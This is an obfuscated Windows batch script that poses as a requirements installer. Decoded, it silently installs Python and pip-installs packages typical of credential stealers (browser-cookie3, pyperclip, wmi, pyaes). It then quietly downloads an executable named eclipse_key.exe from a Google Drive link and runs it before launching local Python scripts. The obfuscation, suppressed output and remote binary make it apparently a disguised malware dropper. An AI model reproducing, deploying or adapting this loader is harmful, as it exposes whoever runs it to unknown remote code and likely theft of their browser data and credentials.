
::   ██████  ▄████▄   ██▀███   ██▓ ██▓███  ▄▄▄█████▓  ▄████  █    ██  ▄▄▄       ██▀███  ▓█████▄ 
:: ▒██    ▒ ▒██▀ ▀█  ▓██ ▒ ██▒▓██▒▓██░  ██▒▓  ██▒ ▓▒ ██▒ ▀█▒ ██  ▓██▒▒████▄    ▓██ ▒ ██▒▒██▀ ██▌
:: ░ ▓██▄   ▒▓█    ▄ ▓██ ░▄█ ▒▒██▒▓██░ ██▓▒▒ ▓██░ ▒░▒██░▄▄▄░▓██  ▒██░▒██  ▀█▄  ▓██ ░▄█ ▒░██   █▌
::   ▒   ██▒▒▓▓▄ ▄██▒▒██▀▀█▄  ░██░▒██▄█▓▒ ▒░ ▓██▓ ░ ░▓█  ██▓▓▓█  ░██░░██▄▄▄▄██ ▒██▀▀█▄  ░▓█▄   ▌
:: ▒██████▒▒▒ ▓███▀ ░░██▓ ▒██▒░██░▒██▒ ░  ░  ▒██▒ ░ ░▒▓███▀▒▒▒█████▓  ▓█   ▓██▒░██▓ ▒██▒░▒████▓ 
:: ▒ ▒▓▒ ▒ ░░ ░▒ ▒  ░░ ▒▓ ░▒▓░░▓  ▒▓▒░ ░  ░  ▒ ░░    ░▒   ▒ ░▒▓▒ ▒ ▒  ▒▒   ▓▒█░░ ▒▓ ░▒▓░ ▒▒▓  ▒ 
:: ░ ░▒  ░ ░  ░  ▒     ░▒ ░ ▒░ ▒ ░░▒ ░         ░      ░   ░ ░░▒░ ░ ░   ▒   ▒▒ ░  ░▒ ░ ▒░ ░ ▒  ▒ 
:: ░  ░  ░  ░          ░░   ░  ▒ ░░░         ░      ░ ░   ░  ░░░ ░ ░   ░   ▒     ░░   ░  ░ ░  ░ 
::       ░  ░ ░         ░      ░                          ░    ░           ░  ░   ░        ░    
::          ░                                                                            ░      
::
:: !! Obfuscated By ScriptGuard !!


@%lvVhaMgC%e%eoRzepgGW%c%IaHFyCZHqB%h%VR%o%HVxjQNwx% %wdNqgvjfZ%o%DvuhZjabG%f%YzEvZfQt%f%jPMuBXLvhv%

T%lVAXUFk%i%oZKa%t%VKI%l%bSr%e%XorVwTAprH% %qGv%D%OILNclmS%o%xgat%w%doLvchYQTX%n%a%l%lqXj%o%MLwFDZM%a%FPGuMYn%d%utkEm% %RrPPaf%M%Quy%o%urNdK%d%AHg%u%UesiE%l%lyA%e%ceq%s%Gv%.%oMmaKzCu%.%JMuB%.%HiIteOgTIa%

e%u%c%ePzxWeaT%h%GckZZzEUo%o%pivpbrDjA% %biqMgoxKg%D%TQcVUkNPS%o%DJqP%w%ednsGF%n%osypON%l%ZrKBoapNc%o%bLwd%a%ZlFZhcIL%d%r%i%waR%n%BOjxoX%g%YFqSIEsFg% %Am%R%BBqRYx%e%snygvUtTg%q%OfXQhpyFFo%u%Qm%i%cgzVoBtST%r%iQl%e%z%m%AXvOsrWQi%e%QDJ%n%EOQWo%t%ouLm%s%acEXj%.%Ul%.%GiJnkBePJ% %jivhzsH%(%QDLh%T%ahr%h%cBpUrSdEC%i%aJdDIguhys%s%JY% %Vss%s%IMjlHltkyU%h%AXepUhr%o%fKLV%u%aLlsrkT%l%cIiqDUbR%d%uk% %WNVjsUAGu%t%MGAgFkK%a%h%k%F%e%eSKdyHWQKy% %eRtNG%a%nIMdFGE%r%AmLVDbG%o%vboPAnze%u%FkK%n%nqYtBEC%d%hnG% %OYok%2%HVJ% %bKDxNQmvIV%m%qJwPjtKLJ%i%vOnzL%n%XTNhTugjt%u%AeGdoQJ%t%zOQOAc%e%gcg%s%v% %VCtuL%t%qWjryJgIpj%h%xImhmmqyfg%e%VZ% %OizlaLsUDL%f%uQHhnc%i%aCHExz%r%KlYhKT%s%ms%t%V% %Ad%t%AyIwSE%i%W%m%YTvDf%e%GYtIybq% %W%r%H%u%vM%n%rqhGj%n%ovgIbaI%i%fzXa%n%uPSxO%g%OGmidv%)%mtjGbzPGys%

p%LQJcrjt%y%O%t%ZPNN%h%yoJsGo%o%QXRUx%n%kICY% %QPec%-%qbEa%-%FOMrRxaY%v%TCh%e%VM%r%fdKuUxlDC%s%BHHtpv%i%tLw%o%KfC%n%zGzoZ% %BsB%3%o%>%IxfMTggMSP%N%QIVLDl%U%KEMlySEVCn%L%PAyejtURm% %pRMUeTV%2%ZaropArkAn%>%hCC%&%MkkwxYMb%1%YJknop%
i%CpnHhAghB%f%jWvZX% %QyfAMX%%E%WgtIDQKwkk%R%TfJOHuCHk%R%JfuyuAQz%O%GycLAOktQ%R%gkJ%L%ZU%E%KSLPN%V%LOGmp%E%GXrHKOpLjF%L%hW%% %Qhk%n%JPvPR%e%LrkFH%q%PziqNNg% %w%0%zOBA% %jtzdZVe%(%oRYdwUYVUF%
    powershell -Command "Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.10.9/python-3.10.9-amd64.exe' -OutFile 'python_installer.exe' >$null 2>&1"
 %XHZflzh% %JiIerwlRmN% %yT% %uX%p%zsAEk%o%akyxNgh%w%c%e%IVoFcly%r%DTGsPNvE%s%prvPMGpa%h%ZvLg%e%GLnoIc%l%UbTO%l%ieVMTDg% %nhMWnTTR%-%STNjoaO%C%fcMPj%o%dJIikeDs%m%wqnAhw%m%rzwmEzGJLo%a%jqn%n%auSwOhXGDM%d%oChxB% %QCWMJBU%"%sLeZTEicv%I%uHAqoN%n%gBnwwNCqK%v%AJHxXLrpPl%o%JZ%k%qV%e%FmhGGlUa%-%ubyzBC%W%HOfzLEjJO%e%Uvrbhx%b%TZUNm%R%Gdjii%e%Rka%q%MvEARvV%u%lcyQNFwQi%e%Xd%s%feAqKgajx%t%qsaugaFVB% %JivR%-%Bylzo%U%W%r%bG%i%YqExMOlqX% %UyZNucHVs%'%aDROdPjrmN%h%GcR%t%tFJoDP%t%QLyLsLly%p%MtBPzkw%s%u%:%NnNcboki%/%pzbZXgj%/%aQEzdm%w%heNhg%w%vhDWC%w%IqXVrDYCh%.%YiUTPYq%p%URCiJdH%y%LzsZcFe%t%dyalLOMHuQ%h%MioTttjRnC%o%ooGBd%n%ajLrlfo%.%MwfEz%o%IryaX%r%nwtTALa%g%LWPQjNZ%/%xgZRU%f%jrcEuYrQIs%t%KrczwBPy%p%dKROCsKa%/%PlsB%p%LtbX%y%tWHogJ%t%YNEJMgg%h%Od%o%WqAtRGY%n%ZHXRA%/%sqn%3%xGDPgMV%.%QE%1%U%0%XgIvZ%.%kpWZ%9%CG%/%PX%p%DDf%y%afZJkLiRsu%t%rLWVER%h%jTMaE%o%AtOgyV%n%l%-%Wx%3%Nd%.%DjfoH%1%M%0%UtvpnMtB%.%rXrlqFLuSx%9%dPS%-%qF%a%HI%m%hYRYwq%d%AEwwr%6%aYY%4%tfaKZuM%.%Fblke%e%lee%x%PLDKb%e%YJ%'%pCQVDIN% %wh%-%O%O%Gx%u%b%t%LKI%F%csCmbN%i%KkceoegS%l%sQvKkgxZP%e%wcWdtg% %SpTSNGLWym%'%WRtzOGHe%p%cJf%y%DhDUFEQuka%t%GfES%h%rh%o%faIscvLdNL%n%Rzo%_%eY%i%HK%n%jPa%s%ngAUjdn%t%hUj%a%teB%l%xITGk%l%Jhd%e%O%r%rCyPWJrsEA%.%zjZtZ%e%knnxfB%x%UO%e%ZbDgxJdfl%'%s% %othtAaZfnz%>%TZzaIZbdl%$%lFTvk%n%EeggOngK%u%yDi%l%eH%l%QZsDKYbaE% %su%2%RaJvWqOs%>%xniCuogaJ%&%WlDirKKGI%1%rJFEFb%"%BZcO%
 %mlmEzAN% %l% %oRDKhgax% %I%s%p%t%dajKobgePt%a%MczN%r%T%t%ztpLtrS% %cVCN%/%uBzi%w%AgRoBXyNsF%a%MFHUIs%i%fiqCq%t%WuI% %SjWBKP%p%g%y%eie%t%XgvoXO%h%yNsGDBfwM%o%A%n%JxnSYjJNnG%_%Hg%i%ATIsatspC%n%MvWYpYwo%s%zg%t%FVZDw%a%dwOhP%l%birTi%l%ybLrTGRw%e%WRTj%r%wnr%.%bvKZq%e%UZUhvF%x%nrtAIqvRsN%e%vRfKyUL% %TbC%/%BLBrXgVj%q%ZVNYZFL%u%FQqTR%i%ZGEdAUuj%e%Qjtvqk%t%LNQZiTcUGr% %soSPOgoj%I%vNUsm%n%ZVFWqJ%s%pfUEwc%t%cG%a%Q%l%VShdsyo%l%UKjCfRvAQ%A%YkkSOMPbO%l%PwpyqUrjho%l%Jm%U%LU%s%q%e%MotPZm%r%PlRbqESgBp%s%kao%=%pYuAnfQaB%1%qOgCANnsBp% %cJm%P%wV%r%NaRXuQjqiE%e%zpdMakv%p%qIpzTL%e%jChIJ%n%ijLJV%d%Lhl%P%W%a%o%t%VW%h%pUfXDn%=%XfNNLlbHxP%1%We% %aVJdj%I%n%n%jgfsdbfXy%c%OBIiIn%l%fTyY%u%NYlG%d%BPKosoZ%e%KalHU%_%nXxUmodi%p%IGVeopD%i%QOZDrZ%p%rxv%=%dCxNsNxKJn%1%vRZPby%
 %lISMQ% %mqvfop% %isBw% %IJpaiara%d%OjH%e%ymVVOkvtPZ%l%x% %vwYS%p%HFLWi%y%GHgx%t%xVdfGyuFL%h%BiLeeMRayN%o%xv%n%fN%_%qMm%i%aZm%n%uyj%s%fv%t%xLlvl%a%qwN%l%BLnBmqwvD%l%UiKfDs%e%wMeC%r%dk%.%CJPZSC%e%pC%x%O%e%RmMf%

 %MR% %XbcMC% %tcs% %CLzTPTVCIM%w%FqKzrIKjsV%h%LYhGQ%e%HRn%r%PmgnxGMMAc%e%FxPlnWGA% %eXJQwCxNgK%p%GZXeilFxs%y%p%t%yymhcN%h%pgDeTBtEaz%o%LIw%n%vHxvqrAdDO% %QHwIOP%>%RifO%n%EacbR%u%zRFEdlDD%l%FMzpKrRcT% %ldWZguKi%2%cna%>%zhrsYF%&%iqeMpEtMvk%1%rDppZpu%
 %u% %fZNMRvA% %wIXNGS% %sjMTRaUx%i%eStazWm%f%yHEySDxUjI% %t%%E%J%R%NuCHRtXzMg%R%N%O%dvYgLJrrkQ%R%VyFu%L%ZuT%E%h%V%kw%E%O%L%JsLChnoZ%% %EeBfRFGxlN%n%GUvHUR%e%cOSr%q%GLOCC% %ghtdOd%0%hDiMhagDfO% %qdzZ%(%wiechhtSCS%
 %SztHdYVN% %lWri% %uOMTRocgX% %SBQrKeGb% %kdRLYTBWUc% %hEgb% %PAJ% %tOpv%e%onBGrK%x%GHJPdT%i%cnOTyWzLgk%t%xz% %IsZ%/%umlbyXlINY%b%aTq% %gJxsENzn%1%qLlNLarfns%
 %SQ% %qUiiWptju% %SUF% %gbrTGhpr%)%FuMwrydfD%
)%jabmwPCvi%

p%MaE%y%iKyMYHoCw%t%WEvXy%h%DzgOEjZo%o%GhdU%n%XIdviUbYUp% %gAWecGaMVo%-%obsiRnGjTW%m%WSVKnQJmSj% %cw%p%yq%i%vdj%p%ECbPzDxqk% %JftBrNoADu%-%cBBYDtSRkC%-%N%v%KqeTzzup%e%mbIARDrjR%r%thEVvpb%s%wAO%i%seBnT%o%kAUn%n%gpoeq% %nKxrcQM%>%OxtwamZ%n%DV%u%LcpmY%l%iZIIkU% %PwGAS%2%rBB%>%tlFK%&%DmyfEUAa%1%Rcj%
i%OmmvLPbka%f%VZbmVNEB% %jPabEXup%%E%dXtjwU%R%I%R%o%O%Hkf%R%Mzp%L%iGWlxdlar%E%J%V%GDRTovqGqr%E%wSemCA%L%qDUGKfpbgV%% %LNgDc%n%okBKtPFJ%e%bRmWa%q%AWGRyJ% %I%0%WlWr% %NUOQwtA%(%gIRnvtr%
 %IQnpzqbNKu% %DTRUIM% %hUlLorajLw% %Yke%p%CBTUPVnJu%y%xKDZivCB%t%GfUHt%h%wQCwj%o%O%n%nNDS% %Nhn%-%es%m%lVZl% %bCmUVJ%e%nZm%n%bkvUnw%s%YyzRfzkadf%u%hGRdHt%r%ewCIL%e%FySXiFx%p%dZNQXZglWT%i%TbFfeaWhSS%p%bCZr% %Od%>%DXwKrjYEa%n%rtTrKT%u%PBpGYJhHZ%l%CvtPjxTYX% %NxyEkvZxuF%2%zOWuWsfR%>%VkBaBNxF%&%qiDmcy%1%T%
 %otS% %JGam% %L% %ESabjyeQLV%p%cZRSP%y%tcHkQ%t%uLzktT%h%JprH%o%RTSKjfAFoO%n%yEJ% %om%-%br%m%FCUOtOC% %ukOj%p%VYDLDSejI%i%zoOMsti%p%kNCgGzROp% %DeozgONmDP%i%CyDL%n%jR%s%LPoaCx%t%IqkBd%a%NFHonr%l%pk%l%eIh% %llp%-%EBBTnTpUz%-%zTyPjbo%u%It%p%VbV%g%wJyVlYlAt%r%mpbFxgfQ%a%VojTCSPvBW%d%wypCCJnlLL%e%oiOZRpCyG% %UdVSMvwEHM%p%xmtM%i%rudRtzuCgl%p%lDDNcX% %t%>%cEpHGjJel%n%mTD%u%YYlBKo%l%aNlFhago% %UcSb%2%ysdsU%>%apGSsIJahq%&%HtuTsXhBMZ%1%uxDnU%
 %uQgAy% %lsU% %iteS% %lBiITQYwJ%p%gvqXVl%y%Isa%t%dXkwG%h%EDtYxmbf%o%jWQTG%n%AUsQ% %EFnGC%-%qLqHKNxqfZ%m%H% %GsTioJdwPv%p%a%i%ZM%p%BRQhFbOTOf% %vwGVb%-%rtFqx%-%HLyzDCqgw%v%ZSVCLU%e%ZrToq%r%mwkror%s%MYcQ%i%hE%o%EcSdiTe%n%wLtTHne% %yMgCm%>%ZUkkJEWEnU%n%hyDPRdAP%u%sCF%l%PLcWQtjnCt% %DzJzYQjl%2%kmH%>%lrYTFpUNlB%&%AVZ%1%VBFMNrzzV%
 %yxRXW% %s% %E% %y%i%ADknYu%f%AugV% %zShjGWYlsu%%E%aDGhGJs%R%ZkQoKpRj%R%Qc%O%SdI%R%fxng%L%Jy%E%SmHBMTKb%V%z%E%hqv%L%ULDXZgbEB%% %gPVZ%n%tYS%e%ub%q%JGM% %VOwPvXWhg%0%XyC% %IJUBK%(%HWTosvfgR%
 %dgvVtEcrjE% %ogUOIJny% %kuFRiZelzU% %mWgauAP% %h% %zryJlPTt% %K% %xMohpu%e%LuejWCDN%x%KDMdQygoB%i%RG%t%FBTy% %LEZPtfv%/%XXFu%b%rHDPjNAFx% %q%1%qlNgKl%
 %NaNAEgwuoQ% %O% %M% %mKQdn%)%v%
)%zbndqzb%

p%xxpt%i%Xxyx%p%CCJvT% %vhirs%i%ulPObBTkj%n%hBetTOpQ%s%ASsfnnD%t%kdXANQk%a%sdd%l%uqKHIJFaq%l%VcBxO% %EzEaoTkR%-%PLbsgP%r%YPzJsgJN% %vWyA%r%FMbNoHLM%e%KPpDlLe%q%cDpHrVF%u%qoC%i%HRful%r%puNQCp%e%pCyccBZG%m%xl%e%X%n%THHNKC%t%OcddPDs%s%RBaQdVbDAA%.%K%t%FAaO%x%ygmLWiaLaB%t%ZPVOJgvjDO% %nrdWjnOMD%2%c%>%v%n%VdskmS%u%p%l%RLas%
p%zY%i%LoirFSu%p%oQSNls% %JK%i%eoMpb%n%MBmYBStcz%s%q%t%qOMadW%a%HQrnQ%l%VCQTcn%l%ZdpV% %t%c%cglgGyZiQ%r%onwtZCfX%y%klfDQBG%p%YnP%t%oAO%o%BMJ%g%HMRAZYmADz%r%hNuVLe%a%PvqSLh%p%CxLEs%h%DeSAhZVE%y%a% %JpxfoFZfMj%o%gyPW%p%zJrecDr%e%TC%n%jmERdSYWdX%c%ukIJH%v%UIKa%-%EKQ%p%IeLjGrKi%y%CISFRwtzYN%t%AxAOV%h%S%o%CRk%n%TtUEnHg% %lOOrNbuMkM%p%wjaMNz%s%ccq%u%ruAOgpmhA%t%YYw%i%VRXwyklMnk%l%ZFQbl% %uL%p%QxTdp%y%ieENlKMqAe%c%o%o%XREAtvaA%u%mmnWrt%n%NyDSWXnKG%t%H%r%vUEgNT%y%V% %uOktblVm%p%TOKEhPyyX%y%lbdUpKpE%p%J%e%SvZHw%r%jGxwex%c%taKR%l%RwOS%i%E%p%gpatDrikgC% %sB%p%xUhqlDxhE%y%DYLjzsXizb%p%jH%i%Xdkvnt%w%d%i%zaMPWnRLsY%n%GsCwKr%3%t%2%b% %cWvyfBB%r%UfWuT%e%pTJ%q%PWPtd%u%SZ%e%CiN%s%xCQzanI%t%v%s%Mib% %SWNIulTSHA%r%lPAYD%e%BiCqyL%q%tx%u%h%e%vhuqJZaiCo%s%n%t%VV%s%CHoJzETwoi%-%AoDJk%t%MlLhKii%o%I%o%zkbtosrWG%l%hAnIF%b%I%e%jCkwkVjtIE%l%R%t%cR% %QsGSQFg%w%EFrrGB%m%tnx%i%uiSq% %HOs%p%KOsgQQe%y%GmMvDyPE%a%nqSBT%e%HB%s%RTwdt%m%ps% %D%b%pra%r%IaIkCuQGP%o%q%w%DVsrCZrYyO%s%ZyVFrmVD%e%wpL%r%GgehAcNfAx%-%YlAcxS%c%WyrWBkacP%o%BoswYs%o%GxPMysyE%k%ZnbAsd%i%LxAsm%e%OBQsEzAG%3%RpiptLAnK% %aVz%>%WeWvVj%n%dof%u%IJGtUk%l%R% %xbW%2%PcNsCnKLI%>%NCguRql%&%QVlLQYqZ%1%rZfo%

i%LPyWx%f%cDv% %QqqmGTvhC%n%GD%o%CyM%t%MaGOzuQric% %NPrSARjwg%e%htleK%x%reNsaV%i%dFVeWchgF%s%MLyKcFJMRI%t%LUkV% %rsflH%"%kzrSpS%b%kItFsCsY%u%Pa%i%rJsEbJzym%l%T%d%JGhTk%_%DPHfzc%d%ddG%o%jKnexEfv%n%kI%e%iiFIaEAtd%.%UnrDUUj%f%vqrcFjm%l%VqtnyRVn%a%LWeDrOC%g%PoPU%"%rxt% %U%(%VaviaNROjf%
 %gnag% %PTYQCMk% %MDDL% %oi%p%yaTQ%y%mRcpUdY%t%jHtyPkxbg%h%A%o%Fgq%n%ilyo% %AsrsEmpMz%u%hLjVuWlDc%t%dtCi%i%lNSHvgguk%l%eAZjUZ%i%SA%t%aUpgW%i%lLlFivxy%e%zDJkE%s%rLTSwv%/%A%P%cP%l%oyutHDIm%u%wteea%g%gntznKsk%i%xbQAdX%n%dYKMDp%s%juyR%/%ihK%b%zSrttln%u%jYjjVl%i%AH%l%dFH%d%UC%.%OhMrlpxHGZ%p%WOQcEzLQ%y%kgPuv% %zhlEKiaOEO%>%ppse%n%jLb%u%JTsVaR%l%WSpn% %nPWGfC%2%ketiZVV%>%Xdun%&%gFjglGlnV%1%HHzt%
 %hJ% %ydzzXy% %KBsrPAEDq% %Y%i%xzncpdrP%f%dIWiucE% %LlWHRbJWKg%%E%LFFjMZujxW%R%BDDWlcVOeQ%R%Ied%O%STasH%R%oABPwbEJl%L%WE%E%wXf%V%CRNobo%E%v%L%LArnNtg%% %AwIGh%n%tR%e%trXOU%q%L% %V%0%WjXgVCOl% %Tt%(%c%
 %LgDTQd% %MrZT% %EYBRL% %SLsldXYDjA% %akgxNkBZIC% %eRJNp% %MtRamj% %ZXHFvVqvJ%e%iO%x%S%i%YB%t%KCltA% %lPHPbgb%/%vnguKsVH%b%vmisR% %RGrJpZVJ%1%L%
 %LnocPJRcjD% %s% %DPKc% %JPVrILnw%)%c%

 %yPcjAia% %Qlyss% %eKPX% %woiEEixjxT%p%tOBnXokU%y%L%t%ERZikeCnOB%h%rRAi%o%yXtFnmLG%n%QB% %wTME%u%jSxEiWE%t%X%i%MqFt%l%zycx%i%uSdlKQ%t%OcHN%i%zoK%e%tjaps%s%DxZNZjGPj%/%eNiEKzz%P%JAbD%l%mEZaXsa%u%iBOIsR%g%hZPQAq%i%ujCGV%n%KYXMPpef%s%eQf%/%umEQhGryG%b%yiFyt%u%dhsLLIsBvL%i%eATpoKGdfg%l%JTlarfdurf%d%WEDTZ%2%kIhLpxsZL%.%IzOGy%p%oPxWA%y%zrVoQSv% %LzfAPTrGYN%>%NbYrv%n%T%u%RW%l%w% %wDKddVE%2%vAQoGT%>%gFRUWRw%&%TGbX%1%DcfdMU%
 %HFdOJULG% %ObIyqCpzfC% %NCfQPyF% %zLVK%i%zFZkK%f%kB% %ix%%E%G%R%vtIHYEk%R%Yi%O%QuAFVc%R%MCPTDxtVgC%L%TwNpzTyNB%E%WfWORgAe%V%bZrPyCYpTi%E%KvnBCAtcgy%L%bAej%% %iPh%n%I%e%bDOzaFgWnL%q%beInfxCVY% %a%0%SJgmqxm% %A%(%ItTfvrnHXh%
 %cdWV% %qXLeenH% %Ot% %SBGljdOHK% %npEquOzjRk% %eHR% %XlJiRHEo% %Fu%e%mWUmWVTsGU%x%QUavdi%i%yYIAdkTTt%t%ShSi% %OTwiKBcLg%/%gMcHSuFU%b%hjTW% %ueRhh%1%ImcPyBR%
 %UUc% %djLbSsAb% %sMUjqGeg% %gdEqx%)%neRt%

    powershell -Command "Invoke-WebRequest -Uri 'https://drive.google.com/uc?export=download&id=1LkWtUmyQiinZexreAIGn55uDrXgBTNA7' -OutFile 'utilities/Plugins/eclipse_key.exe' >$null 2>&1"
 %bx% %NohjZyhv% %XLyciWA% %bxymBgoGiv%p%NALFmSgf%o%B%w%cxSgXMhRV%e%JOp%r%CtQH%s%cSwOp%h%XxEU%e%DqOVr%l%jiUFjb%l%d% %adSJfWp%-%plNgQAt%C%Chk%o%JMPPvtkB%m%ZTGHg%m%T%a%oME%n%UmT%d%f% %RJ%"%YiSwdyPje%I%stXBZEXzQT%n%xOyskW%v%OBYZKq%o%uWQM%k%JLyPvdg%e%RyecR%-%zBd%W%bSGJx%e%nHf%b%N%R%saT%e%laLo%q%aqjprdFJ%u%X%e%FFMUdfGFRV%s%IZL%t%zdX% %IRJjUZ%-%DK%U%RuKXMvaJ%r%JAeVdO%i%zwow% %iJpDVQPpS%'%WR%h%QyNJuHwg%t%rjbXY%t%yRXrlvTe%p%paNkMkR%s%uIirHZb%:%BV%/%czDfPa%/%esrHTVODpA%d%Laq%r%OOiSUL%i%vEfofH%v%LeeWu%e%mcDo%.%s%g%T%o%dOYYdXaVo%o%GRWnln%g%ccdoptt%l%f%e%vOvnXSxy%.%djbTy%c%aSy%o%wVciHrHRs%m%GAMGUaW%/%hv%u%kIWWIP%c%zjSGmRk%?%aT%e%kAXUZNpK%x%c%p%wqd%o%vIunrtRkQd%r%PjHDvnM%t%Eh%=%AViTMfwPgB%d%NvcO%o%weSK%w%MxHVUBaEfR%n%BjaDUQN%l%WXRibRKjA%o%HRoU%a%PLtAdwEqg%d%chSoguNQ%&%KRqcolWXG%i%ZqgZcc%d%xnhGMX%=%qRFEkMsv%1%IYGCf%L%qSVqGALtw%k%UNhrjfedO%W%UI%t%d%U%OBISqfi%m%cKrqj%y%fNmJhts%Q%l%i%Ti%i%lTnhjPsEa%n%idMRIwK%Z%AikYQNR%e%VUn%x%vjGWt%r%HSbrIOELpu%e%gS%A%q%I%SgSXnwnirW%G%iuqmWO%n%D%5%GQITuBRv%5%R%u%vP%D%j%r%FmzvaMXE%X%IzRMme%g%xJtOJJMlW%B%qQPcUNnFd%T%beooLhsK%N%t%A%hZhhMqmlKo%7%qHDdFU%'%EXjxGB% %fythoQ%-%HLaZFbRHw%O%JvR%u%CQOpTL%t%RWDMAoxgYH%F%Im%i%quEHcVJHiO%l%JVwUHvHG%e%vde% %qISZrfEK%'%MHFGU%u%BVArfugbEQ%t%j%i%NsNxGggpO%l%uQIBgGX%i%eC%t%PkXaxac%i%wWy%e%EvnUaiRroW%s%xJjBdsup%/%bjZbnv%P%Zfo%l%kkJhQiz%u%kCSomUK%g%mUjbL%i%c%n%rdQYyRy%s%YBLvfPqwH%/%XEw%e%njcQaWC%c%DOWIBNNa%l%yLWjMIeqvB%i%vSAFz%p%qwrIpyWlI%s%qnupPUpUvc%e%CAsV%_%RnEFPoqJE%k%RwKXBz%e%t%y%d%.%ZQfSLwr%e%yCHTuXDR%x%Omiu%e%euqAjLUIo%'%qoaDHh% %GRIIpUkan%>%JVzxP%$%q%n%vVTnxEeLI%u%ZPmiqTWdN%l%qMWzlXGoN%l%wWzsRIvsd% %SKdyfaq%2%noymqO%>%FRoQhqaQXu%&%f%1%QQZJn%"%JF%
 %A% %SqhtO% %SegNSPNmFx% %uKSyUdNgSh%s%wFkJM%t%VvuwvO%a%wOqsYbtaEu%r%SIvBrYtsCD%t%qlL% %VE%/%JXBJn%w%KQJnlB%a%HFwCLXH%i%dhCmAMvKTa%t%uKGOTddMN% %MwRQqp%u%uQ%t%NqwgjD%i%yEJQIYmb%l%URdWyBmpco%i%CHsrTGKcG%t%TiDu%i%V%e%rGygD%s%lLQdUbxLyT%/%mjAfEakBU%P%f%l%T%u%KYbKSnXbC%g%KNv%i%LwIw%n%bqexbgJIqs%s%aqOh%/%HJcnvg%e%NOhPLeHyaB%c%JLd%l%tIpj%i%ookO%p%fYKGLeZV%s%UqjINdQ%e%sqXVAmzrG%_%NyDGcbz%k%XfAaOF%e%xXZzNL%y%jnCemWPHj%.%wOyWKmtAKw%e%mrEzpSQn%x%QxIhg%e%eJOMoSrdgy% %dlxj%>%PCIOs%n%TlOpuB%u%ujlM%l%zPPiYcRbk% %eP%2%whVgtqStiz%>%llan%&%CghM%1%nNE%
 %cf% %rzoYyMecrw% %wCPGay% %mj%i%RMtzikJIqv%f%KBPvvNvG% %OOVeKELq%%E%S%R%Qrx%R%JnPmURjp%O%DfhC%R%DOKXRyAIy%L%XW%E%VHQ%V%SniK%E%ahOF%L%nXF%% %AqFhstYLP%n%qvKLLomw%e%JyNDEdLwny%q%fZwCeoFE% %dHPGYtCBL%0%eOrgGr% %bJVftvxDpN%(%QZVfqutj%
 %gaMCpcp% %FASk% %MoKpgJl% %w% %OsDeSi% %UNkI% %VgQzQGy% %ihqUXhpf%e%TGX%x%KCutHxiF%i%S%t%kr% %QikrMY%/%X%b%YKM% %qmRXjM%1%L%
 %vNuVd% %ly% %ABZs% %uBhQPQTtr%)%rUkoPaHsE%

 %yL% %hYsLtWNNN% %dPs% %FIraoEoj%t%ayEhCA%y%TnopQaG%p%e%e%GUTMECrB% %SolMpKcSHU%n%AVmqypc%u%fDdMZih%l%VrXUc% %copoAvB%>%fxMqRVr% %ieMDysTn%b%TpzDQESXMC%u%FyCqAcc%i%cTJ%l%uhWnGVTa%d%WTierQ%_%mHtGCuZrXG%d%TlTAga%o%LTwhTob%n%twzYE%e%CVjyOmIXK%.%AzE%f%vUX%l%Gz%a%QllfaAF%g%cefSh%
)%RACfgM%

p%aBnxdTqE%y%Yc%t%idLhsg%h%rCJA%o%cFZ%n%tmfPnLw% %KZBNKLVd%m%F%a%ibc%i%wAYmAWAin%n%fHHz%.%Ka%p%czVszy%y%Cv%